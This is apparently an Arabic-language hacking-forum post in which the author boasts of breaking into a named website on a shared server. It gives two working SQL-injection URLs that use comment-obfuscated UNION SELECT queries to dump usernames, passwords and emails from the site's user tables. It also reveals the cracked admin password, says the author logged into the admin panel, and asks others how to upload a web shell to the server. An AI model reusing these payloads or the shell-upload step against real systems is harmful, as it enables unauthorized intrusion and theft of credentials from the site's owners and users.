:show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع
كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users--
ملحوظة الباسورد بعد فك التشفيرة هو :: password
http://chiirichtown.com/admin
ويوجد جدول اخر
كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login--
وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما